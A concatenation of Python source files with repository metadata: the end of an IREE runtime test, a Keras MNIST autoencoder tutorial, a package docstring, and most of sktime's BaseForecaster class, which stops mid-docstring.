    f_repr = repr(f)
    logging.info("f_repr: %s", f_repr)
    self.assertEqual(f_repr, "<VmFunction simple_mul(0rr_r), reflection = {}>")
  def test_duplicate_module(self):
    ctx = iree.runtime.SystemContext()
    self.assertTrue(ctx.is_dynamic)
    ctx.add_vm_module(create_simple_mul_module())
    with self.assertRaisesRegex(ValueError, "arithmetic"):
      ctx.add_vm_module(create_simple_mul_module())
  def test_static_invoke(self):
    ctx = iree.runtime.SystemContext()
    self.assertTrue(ctx.is_dynamic)
    ctx.add_vm_module(create_simple_mul_module())
    self.assertEqual(ctx.modules.arithmetic.name, "arithmetic")
    f = ctx.modules.arithmetic["simple_mul"]
    arg0 = np.array([1., 2., 3., 4.], dtype=np.float32)
    arg1 = np.array([4., 5., 6., 7.], dtype=np.float32)
    results = f(arg0, arg1)
    np.testing.assert_allclose(results, [4., 10., 18., 28.])
  # TODO: Re-implement tracing in a more sustainable fashion.
  # def test_serialize_values(self):
  #   ctx = iree.runtime.SystemContext()
  #   self.assertTrue(ctx.is_dynamic)
  #   ctx.add_vm_module(create_simple_mul_module())
  #   self.assertEqual(ctx.modules.arithmetic.name, "arithmetic")
  #   f = ctx.modules.arithmetic["simple_mul"]
  #   arg0 = np.array([1., 2., 3., 4.], dtype=np.float32)
  #   arg1 = np.array([4., 5., 6., 7.], dtype=np.float32)
  #   results = f(arg0, arg1)
  #   inputs, outputs = f.get_serialized_values()
  #   self.assertEqual(inputs, ("4xf32=1 2 3 4", "4xf32=4 5 6 7"))
  #   self.assertEqual(outputs, ("4xf32=4 10 18 28",))
  def test_load_vm_module(self):
    arithmetic = iree.runtime.load_vm_module(create_simple_mul_module())
    arg0 = np.array([1., 2., 3., 4.], dtype=np.float32)
    arg1 = np.array([4., 5., 6., 7.], dtype=np.float32)
    results = arithmetic.simple_mul(arg0, arg1)
    np.testing.assert_allclose(results, [4., 10., 18., 28.])
if __name__ == "__main__":
absltest.main()
| 35.218182 | 113 | 0.684822 |
754c2bd5f8cf09de61a4ef9b4e65bea793ac4c7b | 2,201 | py | Python | kerasTUT/9-Autoencoder_example.py | hebangyi/tutorials | cdad8a1999cf5611104990088ead53b4c056893b | [
"MIT"
] | 10,786 | 2016-06-10T10:58:42.000Z | 2022-03-31T06:45:24.000Z | kerasTUT/9-Autoencoder_example.py | yyyyyyx/tutorials | c36c8995951bc09890efd329635c2b74bd532610 | [
"MIT"
] | 73 | 2016-07-13T08:13:22.000Z | 2020-11-08T04:57:08.000Z | kerasTUT/9-Autoencoder_example.py | yyyyyyx/tutorials | c36c8995951bc09890efd329635c2b74bd532610 | [
"MIT"
] | 6,303 | 2016-06-19T03:29:27.000Z | 2022-03-31T07:58:22.000Z | """
To know more or get code samples, please visit my website:
https://mofanpy.com/tutorials/
Or search: 莫烦Python
Thank you for supporting!
"""
# please note, all tutorial code are running under python3.5.
# If you use the version like python2.7, please modify the code accordingly
# 9 - Autoencoder example
# to try tensorflow, un-comment following two lines
# import os
# os.environ['KERAS_BACKEND']='tensorflow'
import numpy as np
np.random.seed(1337) # for reproducibility
from keras.datasets import mnist
from keras.models import Model
from keras.layers import Dense, Input
import matplotlib.pyplot as plt
# download the mnist to the path '~/.keras/datasets/' if it is the first time to be called
# X shape (60,000 28x28), y shape (10,000, )
(x_train, _), (x_test, y_test) = mnist.load_data()
# data pre-processing
x_train = x_train.astype('float32') / 255. - 0.5 # minmax_normalized
x_test = x_test.astype('float32') / 255. - 0.5 # minmax_normalized
x_train = x_train.reshape((x_train.shape[0], -1))
x_test = x_test.reshape((x_test.shape[0], -1))
print(x_train.shape)
print(x_test.shape)
# in order to plot in a 2D figure
encoding_dim = 2
# this is our input placeholder
input_img = Input(shape=(784,))
# encoder layers
encoded = Dense(128, activation='relu')(input_img)
encoded = Dense(64, activation='relu')(encoded)
encoded = Dense(10, activation='relu')(encoded)
encoder_output = Dense(encoding_dim)(encoded)
# decoder layers
decoded = Dense(10, activation='relu')(encoder_output)
decoded = Dense(64, activation='relu')(decoded)
decoded = Dense(128, activation='relu')(decoded)
decoded = Dense(784, activation='tanh')(decoded)
# construct the autoencoder model
autoencoder = Model(input=input_img, output=decoded)
# construct the encoder model for plotting
encoder = Model(input=input_img, output=encoder_output)
# compile autoencoder
autoencoder.compile(optimizer='adam', loss='mse')
# training
autoencoder.fit(x_train, x_train,
epochs=20,
batch_size=256,
shuffle=True)
# plotting
encoded_imgs = encoder.predict(x_test)
plt.scatter(encoded_imgs[:, 0], encoded_imgs[:, 1], c=y_test)
plt.colorbar()
plt.show()
| 28.217949 | 90 | 0.726034 |
0b25a7594975a6481ba4d969cd3cf525a570b0d6 | 34 | py | Python | tests/__init__.py | sellisd/seir | ae85a6ba95db334efdf133000d2f242f4b478353 | [
"MIT"
] | 8 | 2020-04-08T07:07:02.000Z | 2021-08-10T03:07:54.000Z | tests/__init__.py | sellisd/seir | ae85a6ba95db334efdf133000d2f242f4b478353 | [
"MIT"
] | 15 | 2020-04-07T08:43:45.000Z | 2020-10-01T13:56:47.000Z | tests/__init__.py | sellisd/seir | ae85a6ba95db334efdf133000d2f242f4b478353 | [
"MIT"
] | 8 | 2020-04-06T19:48:54.000Z | 2021-03-03T10:28:30.000Z | """Unit test package for SEIR."""
| 17 | 33 | 0.647059 |
8d8af855779db22a2a7cbe05db10fa912ff0c710 | 36,577 | py | Python | sktime/forecasting/base/_base.py | BINAYKUMAR943/sktime | f02f656de86da420b1c14e58dc60194261969eb3 | [
"BSD-3-Clause"
] | 1 | 2021-05-23T20:39:50.000Z | 2021-05-23T20:39:50.000Z | sktime/forecasting/base/_base.py | BINAYKUMAR943/sktime | f02f656de86da420b1c14e58dc60194261969eb3 | [
"BSD-3-Clause"
] | 1 | 2021-05-15T16:24:02.000Z | 2021-05-16T05:25:31.000Z | sktime/forecasting/base/_base.py | BINAYKUMAR943/sktime | f02f656de86da420b1c14e58dc60194261969eb3 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Base class template for forecaster scitype.
class name: BaseForecaster
Scitype defining methods:
fitting - fit(self, y, X=None, fh=None)
forecasting - predict(self, fh=None, X=None, return_pred_int=False,
alpha=DEFAULT_ALPHA)
fit&forecast - fit_predict(self, y, X=None, fh=None,
return_pred_int=False, alpha=DEFAULT_ALPHA)
updating - update(self, y, X=None, update_params=True)
update&forecast - update_predict(y, cv=None, X=None, update_params=True,
return_pred_int=False, alpha=DEFAULT_ALPHA)
Inspection methods:
hyper-parameter inspection - get_params()
fitted parameter inspection - get_fitted_params()
State:
fitted model/strategy - by convention, any attributes ending in "_"
fitted state flag - is_fitted (property)
fitted state inspection - check_is_fitted()
copyright: sktime developers, BSD-3-Clause License (see LICENSE file)
"""
__author__ = ["Markus Löning", "@big-o", "fkiraly"]
__all__ = ["BaseForecaster"]
from sktime.base import BaseEstimator
from contextlib import contextmanager
from warnings import warn
import numpy as np
import pandas as pd
from sktime.utils.datetime import _shift
from sktime.utils.validation.forecasting import check_X
from sktime.utils.validation.forecasting import check_alpha
from sktime.utils.validation.forecasting import check_cv
from sktime.utils.validation.forecasting import check_fh
from sktime.utils.validation.forecasting import check_y_X
from sktime.utils.validation.series import check_series, check_equal_time_index
from sktime.datatypes import convert_to, mtype
DEFAULT_ALPHA = 0.05
class BaseForecaster(BaseEstimator):
    """Base forecaster template class.

    The base forecaster specifies the methods and method
    signatures that all forecasters have to implement.
    Specific implementations of these methods are deferred to concrete
    forecasters.
    """
    # default tag values - these typically make the "safest" assumption;
    # concrete forecasters override individual entries via set_tags/_tags
    _tags = {
        "scitype:y": "univariate",  # which y are fine? univariate/multivariate/both
        "univariate-only": True,  # does estimator use the exogeneous X?
        "capability:pred_int": False,  # can the estimator produce prediction intervals?
        "handles-missing-data": False,  # can estimator handle missing data?
        "y_inner_mtype": "pd.Series",  # which types do _fit/_predict, support for y?
        "X_inner_mtype": "pd.DataFrame",  # which types do _fit/_predict, support for X?
        "requires-fh-in-fit": True,  # is forecasting horizon already required in fit?
        "X-y-must-have-same-index": True,  # can estimator handle different X/y index?
        "enforce-index-type": None,  # index type that needs to be enforced in X/y
    }
def __init__(self):
self._is_fitted = False
self._y = None
self._X = None
# forecasting horizon
self._fh = None
self._cutoff = None # reference point for relative fh
self.converter_store_y = dict() # storage dictionary for in/output conversion
super(BaseForecaster, self).__init__()
def fit(self, y, X=None, fh=None):
"""Fit forecaster to training data.
Parameters
----------
y : pd.Series, pd.DataFrame, or np.array
Target time series to which to fit the forecaster.
fh : int, list, np.array or ForecastingHorizon, optional (default=None)
The forecasters horizon with the steps ahead to to predict.
X : pd.DataFrame, optional (default=None)
Exogeneous data
Returns
-------
self :
Reference to self.
Notes
-----
Changes state by creating a fitted model that updates attributes
ending in "_" and sets is_fitted flag to True.
stores data in self._X and self._y
stores fh, if passed
updates self.cutoff to most recent time in y
creates fitted model (attributes ending in "_")
sets is_fitted flag to true
"""
# if fit is called, fitted state is re-set
self._is_fitted = False
self._set_fh(fh)
# input checks and minor coercions on X, y
###########################################
# checking y
enforce_univariate = self.get_tag("scitype:y") == "univariate"
enforce_multivariate = self.get_tag("scitype:y") == "multivariate"
enforce_index_type = self.get_tag("enforce_index_type")
check_y_args = {
"enforce_univariate": enforce_univariate,
"enforce_multivariate": enforce_multivariate,
"enforce_index_type": enforce_index_type,
"allow_None": False,
}
y = check_series(y, **check_y_args, var_name="y")
# end checking y
# checking X
X = check_series(X, enforce_index_type=enforce_index_type, var_name="X")
if self.get_tag("X-y-must-have-same-index"):
check_equal_time_index(X, y)
# end checking X
self._X = X
self._y = y
self._set_cutoff_from_y(y)
# convert y to supported inner type, if necessary
##################################################
# retrieve supported mtypes for _fit
y_inner_mtype = self.get_tag("y_inner_mtype")
X_inner_mtype = self.get_tag("X_inner_mtype")
# convert y and X to a supported internal type
# it y/X type is already supported, no conversion takes place
y_inner = convert_to(
y,
to_type=y_inner_mtype,
as_scitype="Series", # we are dealing with series
store=self.converter_store_y,
)
X_inner = convert_to(
X,
to_type=X_inner_mtype,
as_scitype="Series", # we are dealing with series
)
# checks and conversions complete, pass to inner fit
#####################################################
self._fit(y=y_inner, X=X_inner, fh=fh)
# this should happen last
self._is_fitted = True
return self
def predict(self, fh=None, X=None, return_pred_int=False, alpha=DEFAULT_ALPHA):
"""Forecast time series at future horizon.
Parameters
----------
fh : int, list, np.array or ForecastingHorizon
Forecasting horizon
X : pd.DataFrame, optional (default=None)
Exogenous time series
return_pred_int : bool, optional (default=False)
If True, returns prediction intervals for given alpha values.
alpha : float or list, optional (default=0.95)
Returns
-------
y_pred : pd.Series
Point predictions
y_pred_int : pd.DataFrame - only if return_pred_int=True
Prediction intervals
"""
# handle inputs
self.check_is_fitted()
self._set_fh(fh)
if return_pred_int and not self.get_tag("capability:pred_int"):
raise NotImplementedError(
f"{self.__class__.__name__} does not have the capability to return "
"prediction intervals. Please set return_pred_int=False. If you "
"think this estimator should have the capability, please open "
"an issue on sktime."
)
# input check for X
enforce_index_type = self.get_tag("enforce_index_type")
X = check_series(X, enforce_index_type=enforce_index_type, var_name="X")
# convert X if needed
X_inner_mtype = self.get_tag("X_inner_mtype")
X_inner = convert_to(
X,
to_type=X_inner_mtype,
as_scitype="Series", # we are dealing with series
store=None,
)
# this should be here, but it breaks the ARIMA forecasters
# that is because check_alpha converts to list, but ARIMA forecaster
# doesn't do the check, and needs it as a float or it breaks
# todo: needs fixing in ARIMA and AutoARIMA
# alpha = check_alpha(alpha)
y_pred = self._predict(
self.fh,
X=X_inner,
return_pred_int=return_pred_int,
alpha=alpha,
)
# todo: clean this up, predictive intervals should be returned by other method
if return_pred_int:
pred_int = y_pred[1]
y_pred = y_pred[0]
# convert to default output type, dependent on scitype
scitype_y = self.get_tag("scitype:y")
to_dict = {
"univariate": "pd.Series",
"multivariate": "pd.DataFrame",
"both": "pd.DataFrame",
}
y_out = convert_to(
y_pred,
to_dict[scitype_y],
as_scitype="Series",
store=self.converter_store_y,
)
if return_pred_int:
return (y_out, pred_int)
else:
return y_out
def fit_predict(
self, y, X=None, fh=None, return_pred_int=False, alpha=DEFAULT_ALPHA
):
"""Fit and forecast time series at future horizon.
Parameters
----------
y : pd.Series
Target time series to which to fit the forecaster.
fh : int, list, np.array or ForecastingHorizon
Forecasting horizon, default = y.index (in-sample forecast)
X : pd.DataFrame, optional (default=None)
Exogenous time series
return_pred_int : bool, optional (default=False)
If True, returns prediction intervals for given alpha values.
alpha : float or list, optional (default=0.95)
Returns
-------
y_pred : pd.Series
Point predictions
y_pred_int : pd.DataFrame - only if return_pred_int=True
Prediction intervals
"""
self.fit(y=y, X=X, fh=fh)
return self._predict(fh=fh, X=X, return_pred_int=return_pred_int, alpha=alpha)
def compute_pred_int(self, y_pred, alpha=DEFAULT_ALPHA):
"""
Compute/return prediction intervals for a forecast.
Must be run *after* the forecaster has been fitted.
If alpha is iterable, multiple intervals will be calculated.
public method including checks & utility
dispatches to core logic in _compute_pred_int
Parameters
----------
y_pred : pd.Series
Point predictions.
alpha : float or list, optional (default=0.95)
A significance level or list of significance levels.
Returns
-------
intervals : pd.DataFrame
A table of upper and lower bounds for each point prediction in
``y_pred``. If ``alpha`` was iterable, then ``intervals`` will be a
list of such tables.
"""
self.check_is_fitted()
alphas = check_alpha(alpha)
errors = self._compute_pred_int(alphas)
# compute prediction intervals
pred_int = [
pd.DataFrame({"lower": y_pred - error, "upper": y_pred + error})
for error in errors
]
# for a single alpha, return single pd.DataFrame
if isinstance(alpha, float):
return pred_int[0]
# otherwise return list of pd.DataFrames
return pred_int
def update(self, y, X=None, update_params=True):
"""Update cutoff value and, optionally, fitted parameters.
This is useful in an online learning setting where new data is observed as
time moves on. Updating the cutoff value allows to generate new predictions
from the most recent time point that was observed. Updating the fitted
parameters allows to incrementally update the parameters without having to
completely refit. However, note that if no estimator-specific update method
has been implemented for updating parameters refitting is the default fall-back
option.
Parameters
----------
y : pd.Series, pd.DataFrame, or np.array
Target time series to which to fit the forecaster.
X : pd.DataFrame, optional (default=None)
Exogeneous data
update_params : bool, optional (default=True)
whether model parameters should be updated
Returns
-------
self : reference to self
Notes
-----
Update self._y and self._X with `y` and `X`, respectively.
Updates self._cutoff to last index seen in `y`. If update_params=True,
updates fitted model that updates attributes ending in "_".
"""
self.check_is_fitted()
# input checks and minor coercions on X, y
###########################################
# checking y
enforce_univariate = self.get_tag("scitype:y") == "univariate"
enforce_multivariate = self.get_tag("scitype:y") == "multivariate"
enforce_index_type = self.get_tag("enforce_index_type")
check_y_args = {
"enforce_univariate": enforce_univariate,
"enforce_multivariate": enforce_multivariate,
"enforce_index_type": enforce_index_type,
}
# update only for non-empty data
y = check_series(y, allow_empty=True, **check_y_args, var_name="y")
# end checking y
# checking X
X = check_series(X, enforce_index_type=enforce_index_type, var_name="X")
if self.get_tag("X-y-must-have-same-index"):
check_equal_time_index(X, y)
# end checking X
self._update_y_X(y, X)
# convert y to supported inner type, if necessary
##################################################
# retrieve supported mtypes for _fit
y_inner_mtype = self.get_tag("y_inner_mtype")
X_inner_mtype = self.get_tag("X_inner_mtype")
# convert y and X to a supported internal type
# it y/X type is already supported, no conversion takes place
y_inner = convert_to(
y,
to_type=y_inner_mtype,
as_scitype="Series", # we are dealing with series
store=self.converter_store_y,
)
X_inner = convert_to(
X,
to_type=X_inner_mtype,
as_scitype="Series", # we are dealing with series
)
# checks and conversions complete, pass to inner fit
#####################################################
self._update(y=y_inner, X=X_inner, update_params=update_params)
return self
def update_predict(
self,
y,
cv=None,
X=None,
update_params=True,
return_pred_int=False,
alpha=DEFAULT_ALPHA,
):
"""Make and update predictions iteratively over the test set.
Parameters
----------
y : pd.Series
cv : temporal cross-validation generator, optional (default=None)
X : pd.DataFrame, optional (default=None)
update_params : bool, optional (default=True)
return_pred_int : bool, optional (default=False)
alpha : int or list of ints, optional (default=None)
Returns
-------
y_pred : pd.Series
Point predictions
y_pred_int : pd.DataFrame
Prediction intervals
"""
self.check_is_fitted()
if return_pred_int and not self.get_tag("capability:pred_int"):
raise NotImplementedError(
f"{self.__class__.__name__} does not have the capability to return "
"prediction intervals. Please set return_pred_int=False. If you "
"think this estimator should have the capability, please open "
"an issue on sktime."
)
# input checks and minor coercions on X, y
###########################################
# checking y
enforce_univariate = self.get_tag("scitype:y") == "univariate"
enforce_multivariate = self.get_tag("scitype:y") == "multivariate"
enforce_index_type = self.get_tag("enforce_index_type")
check_y_args = {
"enforce_univariate": enforce_univariate,
"enforce_multivariate": enforce_multivariate,
"enforce_index_type": enforce_index_type,
}
# update only for non-empty data
y = check_series(y, allow_empty=True, **check_y_args, var_name="y")
# end checking y
# checking X
X = check_series(X, enforce_index_type=enforce_index_type, var_name="X")
if self.get_tag("X-y-must-have-same-index"):
check_equal_time_index(X, y)
# end checking X
cv = check_cv(cv)
return self._predict_moving_cutoff(
y,
cv,
X,
update_params=update_params,
return_pred_int=return_pred_int,
alpha=alpha,
)
def update_predict_single(
self,
y_new,
fh=None,
X=None,
update_params=True,
return_pred_int=False,
alpha=DEFAULT_ALPHA,
):
"""Update and make forecasts.
This method is useful for updating forecasts in a single step,
allowing to make use of more efficient
updating algorithms than calling update and predict sequentially.
Parameters
----------
y_new : pd.Series
fh : int, list, np.array or ForecastingHorizon
X : pd.DataFrame
update_params : bool, optional (default=False)
return_pred_int : bool, optional (default=False)
If True, prediction intervals are returned in addition to point
predictions.
alpha : float or list of floats
Returns
-------
y_pred : pd.Series
Point predictions
pred_ints : pd.DataFrame
Prediction intervals
"""
self.check_is_fitted()
self._set_fh(fh)
return self._update_predict_single(
y_new,
self.fh,
X,
update_params=update_params,
return_pred_int=return_pred_int,
alpha=alpha,
)
def score(self, y, X=None, fh=None):
"""Scores forecast against ground truth, using MAPE.
Parameters
----------
y : pd.Series
Target time series to which to compare the forecasts.
fh : int, list, array-like or ForecastingHorizon, optional (default=None)
The forecasters horizon with the steps ahead to to predict.
X : pd.DataFrame, shape=[n_obs, n_vars], optional (default=None)
An optional 2-d dataframe of exogenous variables.
Returns
-------
score : float
sMAPE loss of self.predict(fh, X) with respect to y_test.
See Also
--------
:meth:`sktime.performance_metrics.forecasting.mean_absolute_percentage_error`
"""
# no input checks needed here, they will be performed
# in predict and loss function
# symmetric=True is default for mean_absolute_percentage_error
from sktime.performance_metrics.forecasting import (
mean_absolute_percentage_error,
)
return mean_absolute_percentage_error(y, self.predict(fh, X))
    def get_fitted_params(self):
        """Get fitted parameters.

        Returns
        -------
        fitted_params : dict
            Dictionary of fitted parameters, keyed by parameter name.

        Raises
        ------
        NotImplementedError
            Always, on this base class; concrete forecasters must override.
        """
        raise NotImplementedError("abstract method")
def _set_y_X(self, y, X=None, enforce_index_type=None):
"""Set training data.
Parameters
----------
y : pd.Series
Endogenous time series
X : pd.DataFrame, optional (default=None)
Exogenous time series
"""
# set initial training data
self._y, self._X = check_y_X(
y, X, allow_empty=False, enforce_index_type=enforce_index_type
)
# set initial cutoff to the end of the training data
self._set_cutoff_from_y(y)
def _update_X(self, X, enforce_index_type=None):
if X is not None:
X = check_X(X, enforce_index_type=enforce_index_type)
if X is len(X) > 0:
self._X = X.combine_first(self._X)
def _update_y_X(self, y, X=None, enforce_index_type=None):
"""Update training data.
Parameters
----------
y : pd.Series or pd.DataFrame
Endogenous time series
X : pd.DataFrame, optional (default=None)
Exogenous time series
"""
if len(y) > 0:
self._y = y.combine_first(self._y)
# set cutoff to the end of the observation horizon
self._set_cutoff_from_y(y)
# update X if given
if X is not None:
self._X = X.combine_first(self._X)
    def _get_y_pred(self, y_in_sample, y_out_sample):
        """Combine in- & out-sample prediction, slices given fh.

        Parameters
        ----------
        y_in_sample : pd.Series
            In-sample prediction
        y_out_sample : pd.Series
            Out-sample prediction

        Returns
        -------
        pd.Series
            y_pred, sliced by fh
        """
        # concatenate so that, via the helper column below, in-sample values
        # get indices -len(y_in_sample)..-1 and out-of-sample values 0..n-1
        y_pred = y_in_sample.append(y_out_sample, ignore_index=True).rename("y_pred")
        y_pred = pd.DataFrame(y_pred)
        # Workaround for slicing with negative index
        y_pred["idx"] = [x for x in range(-len(y_in_sample), len(y_out_sample))]
        # keep only the steps requested by the forecasting horizon
        y_pred = y_pred.loc[y_pred["idx"].isin(self.fh.to_indexer(self.cutoff).values)]
        # re-index by absolute time points, drop the helper column and name
        y_pred.index = self.fh.to_absolute(self.cutoff)
        y_pred = y_pred["y_pred"].rename(None)
        return y_pred
    def _get_pred_int(self, lower, upper):
        """Combine lower/upper bounds of pred. intervals, slice on fh.

        Parameters
        ----------
        lower : pd.Series
            Lower bound (can contain also in-sample bound)
        upper : pd.Series
            Upper bound (can contain also in-sample bound)

        Returns
        -------
        pd.DataFrame
            pred_int, prediction intervals (out-sample, sliced by fh)
        """
        pred_int = pd.DataFrame({"lower": lower, "upper": upper})
        # Out-sample fh
        fh_out = self.fh.to_out_of_sample(cutoff=self.cutoff)
        # If pred_int contains in-sample prediction intervals,
        # index the in-sample part negatively so only out-sample steps match
        if len(pred_int) > len(self._y):
            len_out = len(pred_int) - len(self._y)
            # Workaround for slicing with negative index
            pred_int["idx"] = [x for x in range(-len(self._y), len_out)]
        # If pred_int does not contain in-sample prediction intervals
        else:
            pred_int["idx"] = [x for x in range(len(pred_int))]
        # keep only the out-of-sample steps requested by the horizon
        pred_int = pred_int.loc[
            pred_int["idx"].isin(fh_out.to_indexer(self.cutoff).values)
        ]
        # re-index by absolute time points and drop the helper column
        pred_int.index = fh_out.to_absolute(self.cutoff)
        pred_int = pred_int.drop(columns=["idx"])
        return pred_int
    @property
    def cutoff(self):
        """Cut-off = "present time" state of forecaster.

        Returns
        -------
        cutoff : pandas compatible index element, int, or None
            Last index element seen in training data (or its length for
            np.ndarray input); None before any data has been seen.
        """
        return self._cutoff
    def _set_cutoff(self, cutoff):
        """Set and update cutoff.

        Parameters
        ----------
        cutoff : pandas compatible index element

        Notes
        -----
        Sets self._cutoff to `cutoff`.
        """
        self._cutoff = cutoff
def _set_cutoff_from_y(self, y):
"""Set and update cutoff from series y.
Parameters
----------
y: pd.Series, pd.DataFrame, or np.array
Target time series to which to fit the forecaster.
Notes
-----
Set self._cutoff to last index seen in `y`.
"""
if mtype(y, as_scitype="Series") in ["pd.Series", "pd.DataFrame"]:
self._cutoff = y.index[-1]
elif mtype(y, as_scitype="Series") == "np.ndarray":
self._cutoff = len(y)
else:
raise TypeError("y does not have a supported type")
    @contextmanager
    def _detached_cutoff(self):
        """Detached cutoff mode.

        When in detached cutoff mode, the cutoff can be updated but will
        be reset to the initial value after leaving the detached cutoff mode.
        This is useful during rolling-cutoff forecasts when the cutoff needs
        to be repeatedly reset, but afterwards should be restored to the
        original value.
        """
        cutoff = self.cutoff  # keep initial cutoff
        try:
            yield
        finally:
            # re-set cutoff to initial value, even if the body raised
            self._set_cutoff(cutoff)
    @property
    def fh(self):
        """Forecasting horizon that was passed.

        Raises
        ------
        ValueError
            If no fh has been set via fit or predict yet.
        """
        # raise error if some method tries to access it before it has been set
        if self._fh is None:
            raise ValueError(
                "No `fh` has been set yet, please specify `fh` " "in `fit` or `predict`"
            )
        return self._fh
    def _set_fh(self, fh):
        """Check, set and update the forecasting horizon.

        Parameters
        ----------
        fh : None, int, list, np.ndarray or ForecastingHorizon

        Raises
        ------
        ValueError
            If fh is required but missing, or conflicts with the fh seen in fit.
        """
        # whether this forecaster needs fh already at fit time (tag-driven)
        requires_fh = self.get_tag("requires-fh-in-fit")
        msg = (
            f"This is because fitting of the `"
            f"{self.__class__.__name__}` "
            f"depends on `fh`. "
        )
        # below loop treats four cases from three conditions:
        # A. forecaster is fitted yes/no - self.is_fitted
        # B. no fh is passed yes/no - fh is None
        # C. fh is optional in fit yes/no - optfh
        # B. no fh is passed
        if fh is None:
            # A. strategy fitted (call of predict or similar)
            if self._is_fitted:
                # in case C. fh is optional in fit:
                # if there is none from before, there is none overall - raise error
                if not requires_fh and self._fh is None:
                    raise ValueError(
                        "The forecasting horizon `fh` must be passed "
                        "either to `fit` or `predict`, "
                        "but was found in neither."
                    )
                # in case C. fh is not optional in fit: this is fine
                # any error would have already been caught in fit
            # A. strategy not fitted (call of fit)
            elif requires_fh:
                # in case fh is not optional in fit:
                # fh must be passed in fit
                raise ValueError(
                    "The forecasting horizon `fh` must be passed to "
                    "`fit`, but none was found. " + msg
                )
                # in case C. fh is optional in fit:
                # this is fine, nothing to check/raise
        # B. fh is passed
        else:
            # If fh is passed, validate (no matter the situation)
            fh = check_fh(fh)
            # fh is written to self if one of the following is true
            # - estimator has not been fitted yet (for safety from side effects)
            # - fh has not been seen yet
            # - fh has been seen, but was optional in fit,
            # this means fh needs not be same and can be overwritten
            if not requires_fh or not self._fh or not self._is_fitted:
                self._fh = fh
            # there is one error condition:
            # - fh is mandatory in fit, i.e., fh in predict must be same if passed
            # - fh already passed, and estimator is fitted
            # - fh that was passed in fit is not the same as seen in predict
            # note that elif means: optfh == False, and self._is_fitted == True
            elif self._fh and not np.array_equal(fh, self._fh):
                # raise error if existing fh and new one don't match
                raise ValueError(
                    "A different forecasting horizon `fh` has been "
                    "provided from "
                    "the one seen in `fit`. If you want to change the "
                    "forecasting "
                    "horizon, please re-fit the forecaster. " + msg
                )
            # if existing one and new match, ignore new one
    def _fit(self, y, X=None, fh=None):
        """Fit forecaster to training data.

        Core logic; concrete forecasters must override this method.

        Parameters
        ----------
        y : pd.Series
            Target time series to which to fit the forecaster.
        X : pd.DataFrame, optional (default=None)
            Exogenous time series.
        fh : int, list, np.array or ForecastingHorizon, optional (default=None)
            The forecasting horizon with the steps ahead to predict.

        Returns
        -------
        self : returns an instance of self.
        """
        raise NotImplementedError("abstract method")
    def _predict(self, fh, X=None, return_pred_int=False, alpha=DEFAULT_ALPHA):
        """Forecast time series at future horizon.

        Core logic; concrete forecasters must override this method.

        Parameters
        ----------
        fh : int, list, np.array or ForecastingHorizon
            Forecasting horizon
        X : pd.DataFrame, optional (default=None)
            Exogenous time series
        return_pred_int : bool, optional (default=False)
            If True, returns prediction intervals for given alpha values.
        alpha : float or list, optional (default=0.95)

        Returns
        -------
        y_pred : pd.Series
            Point predictions
        y_pred_int : pd.DataFrame - only if return_pred_int=True
            Prediction intervals
        """
        raise NotImplementedError("abstract method")
    def _update(self, y, X=None, update_params=True):
        """Update time series to incremental training data.

        Core logic; default falls back to re-fitting on all stored data.

        Parameters
        ----------
        y : pd.Series
            New observations of the target series.
        X : pd.DataFrame, optional (default=None)
            Exogenous time series
        update_params : bool, optional (default=True)
            Whether model parameters should be updated.

        Returns
        -------
        self : reference to self

        Notes
        -----
        self._y and self._X have already been updated by the public `update`.
        If update_params=True, re-fits on all stored data (self._y, self._X);
        concrete forecasters may override with an efficient incremental update.
        """
        if update_params:
            # default to re-fitting if update is not implemented
            warn(
                f"NotImplementedWarning: {self.__class__.__name__} "
                f"does not have a custom `update` method implemented. "
                f"{self.__class__.__name__} will be refit each time "
                f"`update` is called."
            )
            # refit with updated data, not only passed data
            self.fit(self._y, self._X, self.fh)
            # todo: should probably be self._fit, not self.fit
            # but looping to self.fit for now to avoid interface break
        return self
    def _update_predict_single(
        self,
        y,
        fh,
        X=None,
        update_params=True,
        return_pred_int=False,
        alpha=DEFAULT_ALPHA,
    ):
        """Update forecaster and then make forecasts.

        Implements default behaviour of calling update and predict
        sequentially, but can be overwritten by subclasses
        to implement more efficient updating algorithms when available.
        """
        self.update(y, X, update_params=update_params)
        return self.predict(fh, X, return_pred_int=return_pred_int, alpha=alpha)
    def _compute_pred_int(self, alphas):
        """Calculate the prediction errors for each point.

        Parameters
        ----------
        alphas : float or list of float
            A significance level or list of significance levels.

        Returns
        -------
        errors : list of pd.Series
            Each series in the list will contain the errors for each point in
            the forecast for the corresponding alpha.
        """
        # this should be the NotImplementedError
        # but current interface assumes private method
        # _compute_pred_err(alphas), not _compute_pred_int
        # so looping this through in order for existing classes to work
        return self._compute_pred_err(alphas)
        # todo: fix this in descendants, and change to
        # raise NotImplementedError("abstract method")
    def _compute_pred_err(self, alphas):
        """Temporary loopthrough for _compute_pred_err.

        Concrete forecasters with interval capability override this.
        """
        raise NotImplementedError("abstract method")
    def _predict_moving_cutoff(
        self,
        y,
        cv,
        X=None,
        update_params=True,
        return_pred_int=False,
        alpha=DEFAULT_ALPHA,
    ):
        """Make single-step or multi-step moving cutoff predictions.

        Parameters
        ----------
        y : pd.Series
        cv : temporal cross-validation generator
        X : pd.DataFrame
        update_params : bool
        return_pred_int : bool
            Not supported here; must be False.
        alpha : float or array-like

        Returns
        -------
        y_pred = pd.Series
        """
        if return_pred_int:
            raise NotImplementedError()
        fh = cv.get_fh()
        y_preds = []
        cutoffs = []
        # enter into a detached cutoff mode, so the repeated cutoff updates
        # below do not permanently change the forecaster's state
        with self._detached_cutoff():
            # set cutoff to time point before data
            self._set_cutoff(_shift(y.index[0], by=-1))
            # iterate over data
            for new_window, _ in cv.split(y):
                y_new = y.iloc[new_window]
                # we cannot use `update_predict_single` here, as this would
                # re-set the forecasting horizon, instead we use
                # the internal `_update_predict_single` method
                y_pred = self._update_predict_single(
                    y_new,
                    fh,
                    X,
                    update_params=update_params,
                    return_pred_int=return_pred_int,
                    alpha=alpha,
                )
                y_preds.append(y_pred)
                cutoffs.append(self.cutoff)
        return _format_moving_cutoff_predictions(y_preds, cutoffs)
def _format_moving_cutoff_predictions(y_preds, cutoffs):
"""Format moving-cutoff predictions.
Parameters
----------
y_preds: list of pd.Series or pd.DataFrames, of length n
must have equal index and equal columns
cutoffs: iterable of cutoffs, of length n
Returns
-------
y_pred: pd.DataFrame, composed of entries of y_preds
if length of elements in y_preds is 2 or larger:
row-index = index common to the y_preds elements
col-index = (cutoff[i], y_pred.column)
entry is forecast at horizon given by row, from cutoff/variable at column
